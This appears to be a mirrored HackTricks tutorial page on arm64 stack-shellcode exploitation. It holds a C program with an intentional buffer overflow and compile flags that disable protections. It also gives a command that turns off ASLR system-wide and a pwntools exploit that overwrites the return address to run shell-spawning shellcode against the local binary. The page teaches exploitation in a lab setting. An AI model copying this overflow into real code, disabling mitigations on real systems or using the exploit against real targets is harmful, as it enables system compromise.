mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 17:44:47 +00:00
110 lines
4.1 KiB
Markdown
110 lines
4.1 KiB
Markdown
|
# Stack Shellcode - arm64
|
||
|
|
|
||
|
|
{% hint style="success" %}
|
||
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary>Support HackTricks</summary>
|
||
|
|
|
||
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
|
||
|
|
</details>
|
||
|
|
{% endhint %}
|
||
|
|
|
||
|
|
Find an introduction to arm64 in:
|
||
|
|
|
||
|
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||
|
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||
|
|
{% endcontent-ref %}
|
||
|
|
|
||
|
|
## Code 
|
||
|
|
|
||
|
|
```c
|
||
|
|
#include <stdio.h>
|
||
|
|
#include <unistd.h>
|
||
|
|
|
||
|
|
void vulnerable_function() {
|
||
|
|
char buffer[64];
|
||
|
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||
|
|
}
|
||
|
|
|
||
|
|
int main() {
|
||
|
|
vulnerable_function();
|
||
|
|
return 0;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
Compile without pie, canary and nx:
|
||
|
|
|
||
|
|
{% code overflow="wrap" %}
|
||
|
|
```bash
|
||
|
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||
|
|
```
|
||
|
|
{% endcode %}
|
||
|
|
|
||
|
|
## No ASLR & No canary - Stack Overflow 
|
||
|
|
|
||
|
|
To stop ASLR execute:
|
||
|
|
|
||
|
|
```bash
|
||
|
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||
|
|
```
|
||
|
|
|
||
|
|
To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||
|
|
|
||
|
|
Exploit:
|
||
|
|
|
||
|
|
```python
|
||
|
|
from pwn import *
|
||
|
|
|
||
|
|
# Load the binary
|
||
|
|
binary_name = './bof'
|
||
|
|
elf = context.binary = ELF(binary_name)
|
||
|
|
|
||
|
|
# Generate shellcode
|
||
|
|
shellcode = asm(shellcraft.sh())
|
||
|
|
|
||
|
|
# Start the process
|
||
|
|
p = process(binary_name)
|
||
|
|
|
||
|
|
# Offset to return address
|
||
|
|
offset = 72
|
||
|
|
|
||
|
|
# Address in the stack after the return address
|
||
|
|
ret_address = p64(0xfffffffff1a0)
|
||
|
|
|
||
|
|
# Craft the payload
|
||
|
|
payload = b'A' * offset + ret_address + shellcode
|
||
|
|
|
||
|
|
print("Payload length: "+ str(len(payload)))
|
||
|
|
|
||
|
|
# Send the payload
|
||
|
|
p.send(payload)
|
||
|
|
|
||
|
|
# Drop to an interactive session
|
||
|
|
p.interactive()
|
||
|
|
```
|
||
|
|
|
||
|
|
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
|
||
|
|
|
||
|
|
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
|
||
|
|
|
||
|
|
{% hint style="success" %}
|
||
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary>Support HackTricks</summary>
|
||
|
|
|
||
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
|
||
|
|
</details>
|
||
|
|
{% endhint %}
|